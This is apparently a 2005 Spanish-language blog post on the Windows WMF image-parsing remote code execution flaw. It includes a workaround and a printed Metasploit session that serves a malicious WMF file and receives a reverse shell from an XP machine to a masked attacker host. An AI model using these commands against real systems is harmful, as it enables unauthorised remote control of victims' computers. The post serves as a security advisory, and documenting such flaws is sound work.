ecoestadistica.com

jueves, diciembre 29, 2005

Nuevo ¨bug¨ de Windows, sin parche...

Se a publicado un nuevo exploit para windows, que es una version distinta a la consignada en FrSIRT el 30/11/05.Estos archivos de imagen se pueden modificar muy fácilmente para descargar cualquier malware o virus.Ingrese, ayer a la noche, en un sitio con un XP completamente parchado y fui infectado con suma facilidad...
Segurityfocus al respecto aclara:¨El motor grafico de Microsoft Windows WMF es afectado por una vulnerabilidad remota de ejecución de código. El problema se presenta cuando un usuario visualiza un archivo de formato WMF malévolo, accionando la vulnerabilidad cuando el motor procura analizar el archivo. El ¨error¨ se puede explotar remotamente o por un atacante local. Cualquier ejecución del código que ocurra estará con los privilegios del SISTEMA debido a la naturaleza del motor afectado. Microsoft Windows XP se considera vulnerable en el momento. Es probable que otros sistemas operativos de Windows estén afectados también.¨Mas Info.
Cualquier web que exhiba automáticamente una imagen de WMF hará que las máquinas de los usuarios sean infectadas. Esto incluye las viejas versiones de Firefox, versiones actuales de ópera, Outlook y toda versión del Internet Explorer en todas las versiones de Windows.

Codigo para explotar este bug con Metasploit.

Modo de Uso:
msf > use ie_xp_pfv_metafile
msf ie_xp_pfv_metafile > set PAYLOAD win32_reverse
PAYLOAD -> win32_reverse
msf ie_xp_pfv_metafile(win32_reverse) > set LHOST xxx.xxx.xxx.xxx
LHOST -> xxx.xxx.xxx.xxx
msf ie_xp_pfv_metafile(win32_reverse) > exploit

[*] Starting Reverse Handler.
[*] Waiting for connections to http://0.0.0.0:8080/anything.wmf
[*] HTTP Client connected from xxx.xxx.xxx.xxx:1060 using Windows XP
[*] Got connection from xxx.xxx.xxx.xxx <-> xxx.xxx.xxx

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\XXXX\Desktop>

Solucion Temporal para este bug:
En una ventana de comandos ponemos:
REGSVR32 /U SHIMGVW.DLL y reseteamos la maquina.Si tienes problemas para visualizar imagenes con windows, vuelve a habilitarla con REGSVR32 SHIMGVW.DLL.

Salu2

2 Comments:

Blogger Man-in-the-middle said...

Muy bueno Mouse, tu blog, veo que voy a pasar muy a menudo por aqui


saludos,

diciembre 29, 2005 6:11 p. m.  
Blogger Fanky10 said...

Hi!
mira... mi problema reside en poder conseguir el metasploit 2.5 no puedo x ningun lugar... y la pagina en cuestion (alias metasploit.com) no existe mas!!
me podrias facilitar el exe ya q consegui el archivo pero era el q se usa en linux y el ubuntu (je) lo tengo en un cd y ni da para pònerme con linux :P
Saludos!
Fanky10
(contacto: fanky10@yahoo.con.ar)

enero 07, 2006 6:05 p. m.  

Publicar un comentario

Links to this post:

Crear un vínculo

<< Home

ecoestadistica.com